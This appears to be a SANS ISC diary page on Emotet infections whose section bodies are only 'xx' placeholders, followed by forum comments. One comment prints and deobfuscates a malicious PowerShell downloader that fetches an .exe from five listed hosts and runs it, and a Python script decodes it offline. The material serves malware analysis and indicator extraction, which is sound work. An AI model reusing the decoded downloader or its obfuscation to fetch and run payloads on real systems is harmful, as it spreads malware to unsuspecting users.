SANS ISC: Emotet infections and follow-up malware - Internet Security | DShield SANS ISC InfoSec Forums


Emotet infections and follow-up malware

Introduction

xx

The malspam

xx

The traffic

xx

The malware

xx

Indicators of Compromise (IoCs)

xx

Final words

Pcaps of the infection traffic and malware associated with today's diary can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

Brad

340 Posts
ISC Handler
Document http://ciblage-spain[.]es/Transactions/01_19/ contained the following concatenated PowerShell string, observed over two separate strings. (Analyzed with Didier's numbers-to-strings.py)

sEt sx=pow^%PdoB;IC:~5?1^%r^%SESSIOAZAZAME:~-4?1^%(^%TEMP:~-3?1^%ll $ConcreUIelj='SpA;ju'6$Border)dl=new-o`jecUI AZeUI.We`ClienUI6$PCIrd='(UIUIp://r[dinUIr[der.com/AZAOvd1X@(UIUIp://mypuppy)iUIUIer.com/Wcdo9i4Yd`H@(UIUIp://demo).UIec(noex[m.com/e(]w1`mlo@(UIUIp://UIimgi[mgi[.)iUIe/P7p4eo54pAB@(UIUIp://g[ropin-r-01.com/[dodof1TK('.SpliUI#'@'_6$UIurnkeyji='9[UI[iw'6$AZ[UIion[l[z = '882'6$SUIreeUIpv='gold[f'6$S[ving)AccounUIUIo=$env:pu`lic+'\'+$AZ[UIion[l[z+'.exe'6fore[c(#$p[ymenUI)) in $PCIrd_{UIry{$Border)dl.9ownlo[d,ile#$p[ymenUI))? $S[ving)AccounUIUIo_6$9irecUIorpp='B[`yMovie)wf'6If ##GeUI-IUIem $S[ving)AccounUIUIo_.lengUI( -ge 80000_ {Invoke-IUIem $S[ving)AccounUIUIo6$redund[nUIqj='invoicez)'6`re[k6}}c[UIc({}}$]u``err`='invoiced`'6&& SEt cU=!sx:pA=Q!&&set Qedo=!cU:AZ=N!&& SEt yA=!Qedo:UI=t!& seT pw=!yA:do=U!&& SET Oqb=!pw:(=h!& SEt Q4aC=!Oqb:#=(!&& SeT R64=!Q4aC:)=s!& SET Yo=!R64:`=b!&SEt hxfQ=!Yo:[=a!&& seT Xtk=!hxfQ:;=L!& sEt hYF=!Xtk:9=D!&& SEt yb=!hYF:_=)!&& sET xk=!yb:6=;!&& SeT CnA=!xk:]=R!& sEt 1JS=!CnA:,=F!& Set h1Z3=!1JS:?=,!&& eChO %h1Z3% |%ComMOnproGRaMFILeS(X86):~23,-11%%CommonPrOGRamFiLes:~9,1%%tEmp:~-15,-14%

This sample is employing substitution.
--------
Substitution Key

# = (
AZ = N
pA = Q
[ = a
) = s
( = h
UI = t
; = l
] = R
? = ,
6 = ;
, = F
` = b
_ = )
9 = D
? = ,
] = r
do = U

-Substitution applied-

set sx=pow%PuBLIC:~5F1%r%SESSIONNAME:~-4F1%h%TEMP:~-3F1%ll $Concretelj='SQLju';$Bordersdl=new-object Net.WebClient;$PCIrd='http://radintrader.com/NAOvd1X@http://mypuppysitter.com/WcuDi4YdbH@http://demos.technoexam.com/ehrw1bmlo@http://timgiamgia.site/P7p4eo54QB@http://garopin-r-01.com/auuf1TKh'.Split('@');$turnkeyji='Dataiw';$NationalN = '882';$Streetpv='goldaf';$SavingsAccountto=$env:public+'\'+$NationalN+'.exe';foreach($Payments) in $PCIrd){try{$Bordersdl.uwnloadFile($Payments)F $SavingsAccountto);$Directorpp='BabyMovieswf';If ((Get-Item $SavingsAccountto).length -ge 80000) {Invoke-Item $SavingsAccountto;$redundantqj='invoicezs';break;}}catch{}}$rubberrb='invoicedb';

-URLs-

http://radintrader[.]com/NAOvd1X
http://mypuppysitter[.]com/WcdoDi4YdbH
http://demos.technoexam[.]com/ehrw1bmlo
http://timgiamgia[.]site/P7p4eo54QB
http://garopin-r-01[.]com/auuf1TKh

Does anyone have an easier way of extracting the URLs?
Vince

2 Posts
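The substitution chain in the post can be replayed mechanically instead of by hand. The script below is an added example, not part of Vince's post or of the diary: it takes the batch one-liner quoted above (copied unchanged, only split across several string literals), parses each `set NAME=!PREV:FROM=TO!` step in the order it appears, applies them the way cmd does (FROM is matched case-insensitively, TO is inserted exactly as typed), pulls the URLs out of the result and prints them defanged. It also resolves the `%VAR:~start,len%` substring references that spell out the pipe target at the end of the one-liner and the first word of the decoded line; for that it uses a constructed environment with default-looking values for PUBLIC, SESSIONNAME, TEMP, CommonProgramFiles and CommonProgramFiles(x86), which is an assumption, since on a real host the characters picked depend on those paths. Function names are mine. Nothing in it contacts the listed hosts.

```python
"""Replay the cmd 'set NAME=!PREV:FROM=TO!' chain from the Emotet downloader
one-liner quoted in the forum post and extract the payload URLs.
Added example; the batch line is copied from the post, the environment values
below are constructed for illustration."""
import re

# The obfuscated one-liner from the post, unchanged (split only for readability).
BATCH = (
    r"sEt sx=pow^%PdoB;IC:~5?1^%r^%SESSIOAZAZAME:~-4?1^%(^%TEMP:~-3?1^%ll $ConcreUIelj='SpA;ju'6$Border)dl=new-o`jecUI AZeUI.We`ClienUI6"
    r"$PCIrd='(UIUIp://r[dinUIr[der.com/AZAOvd1X@(UIUIp://mypuppy)iUIUIer.com/Wcdo9i4Yd`H@(UIUIp://demo).UIec(noex[m.com/e(]w1`mlo@"
    r"(UIUIp://UIimgi[mgi[.)iUIe/P7p4eo54pAB@(UIUIp://g[ropin-r-01.com/[dodof1TK('.SpliUI#'@'_6$UIurnkeyji='9[UI[iw'6$AZ[UIion[l[z = '882'6"
    r"$SUIreeUIpv='gold[f'6$S[ving)AccounUIUIo=$env:pu`lic+'\'+$AZ[UIion[l[z+'.exe'6fore[c(#$p[ymenUI)) in $PCIrd_{UIry{"
    r"$Border)dl.9ownlo[d,ile#$p[ymenUI))? $S[ving)AccounUIUIo_6$9irecUIorpp='B[`yMovie)wf'6If ##GeUI-IUIem $S[ving)AccounUIUIo_.lengUI( -ge 80000_ "
    r"{Invoke-IUIem $S[ving)AccounUIUIo6$redund[nUIqj='invoicez)'6`re[k6}}c[UIc({}}$]u``err`='invoiced`'"
    r"&& SEt cU=!sx:pA=Q!&&set Qedo=!cU:AZ=N!&& SEt yA=!Qedo:UI=t!& seT pw=!yA:do=U!&& SET Oqb=!pw:(=h!& SEt Q4aC=!Oqb:#=(!&& SeT R64=!Q4aC:)=s!"
    r"& SET Yo=!R64:`=b!&SEt hxfQ=!Yo:[=a!&& seT Xtk=!hxfQ:;=L!& sEt hYF=!Xtk:9=D!&& SEt yb=!hYF:_=)!&& sET xk=!yb:6=;!&& SeT CnA=!xk:]=R!"
    r"& sEt 1JS=!CnA:,=F!& Set h1Z3=!1JS:?=,!&& eChO %h1Z3% |%ComMOnproGRaMFILeS(X86):~23,-11%%CommonPrOGRamFiLes:~9,1%%tEmp:~-15,-14%"
)

# Constructed environment (assumption): default-looking values, not taken from any host.
SAMPLE_ENV = {
    "PUBLIC": r"C:\Users\Public",
    "SESSIONNAME": "Console",
    "TEMP": r"C:\Users\Alice\AppData\Local\Temp",
    "CommonProgramFiles": r"C:\Program Files\Common Files",
    "CommonProgramFiles(x86)": r"C:\Program Files (x86)\Common Files",
}

SET_SX_RE = re.compile(r"\bset\s+sx=(.*?)&&", re.I)
CHAIN_RE = re.compile(r"\bset\s+(\w+)=!(\w+):([^=!]+)=([^!]*)!", re.I)
ECHO_RE = re.compile(r"\becho\s+%(\w+)%", re.I)
SUBSTR_RE = re.compile(r"%([^%:]+):~(-?\d+)(?:,(-?\d+))?%")
URL_RE = re.compile(r"https?://[^\s'\"@]+")


def strip_carets(text):
    """cmd's escape character: '^x' stands for a literal 'x'."""
    return re.sub(r"\^(.)", r"\1", text)


def cmd_replace(value, old, new):
    """%var:old=new% semantics: every occurrence of 'old', matched
    case-insensitively, is replaced by 'new' exactly as typed."""
    return re.sub(re.escape(old), lambda _m: new, value, flags=re.I)


def decode(batch):
    """Walk the set chain in textual order and return the variable that is echoed."""
    env = {"sx": strip_carets(SET_SX_RE.search(batch).group(1))}
    for new, src, old, rep in CHAIN_RE.findall(batch):
        env[new.lower()] = cmd_replace(env[src.lower()], old, rep)
    return env[ECHO_RE.search(batch).group(1).lower()]


def cmd_substring(value, start, length=None):
    """%var:~start,length% semantics, including negative start and length."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if length is None:
        return value[start:]
    end = n + length if length < 0 else start + length
    return value[start:max(end, start)]


def expand_substrings(line, env):
    """Resolve %VAR:~a,b% references against env; unknown variables are left untouched."""
    table = {k.upper(): v for k, v in env.items()}

    def repl(m):
        name = m.group(1).upper()
        if name not in table:
            return m.group(0)
        length = int(m.group(3)) if m.group(3) is not None else None
        return cmd_substring(table[name], int(m.group(2)), length)

    return SUBSTR_RE.sub(repl, line)


def pipe_target(batch, env):
    """The command the echoed line is piped into, spelled out from env substrings."""
    return expand_substrings(batch.rsplit("|", 1)[1].strip(), env)


def extract_urls(decoded):
    """Payload URLs in the order the downloader tries them."""
    return URL_RE.findall(decoded)


def defang(url):
    """hxxp:// and [.] are only a reporting convention so the link is not clickable."""
    scheme, rest = url.split("://", 1)
    host, _, path = rest.partition("/")
    return scheme.replace("tt", "xx") + "://" + host.replace(".", "[.]") + ("/" + path if path else "")


if __name__ == "__main__":
    decoded = decode(BATCH)
    print("pipe target :", pipe_target(BATCH, SAMPLE_ENV))
    print("decoded line:", expand_substrings(decoded, SAMPLE_ENV))
    for url in extract_urls(decoded):
        print("payload URL :", defang(url))
```

Two things worth noticing when comparing the script's output with the hand-worked listing above: the pipe at the end of the one-liner resolves to a second `cmd`, which is what later expands the `%PUBLIC:~5,1%`, `%SESSIONNAME:~-4,1%` and `%TEMP:~-3,1%` pieces into `powershell`; and because each `set` inserts its replacement exactly as typed (`do=U` gives an uppercase U, `]=R` an uppercase R), a few path characters in the decoded URLs come out in a different letter case than in the manual version.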
Quoting Vince: Does anyone have an easier way of extracting the URLs?


Submit the downloaded Word document to app.any.run and use the "fakenet" option. That causes the document to attempt all of the URLs for the Emotet malware binary.
Brad

340 Posts
ISC Handler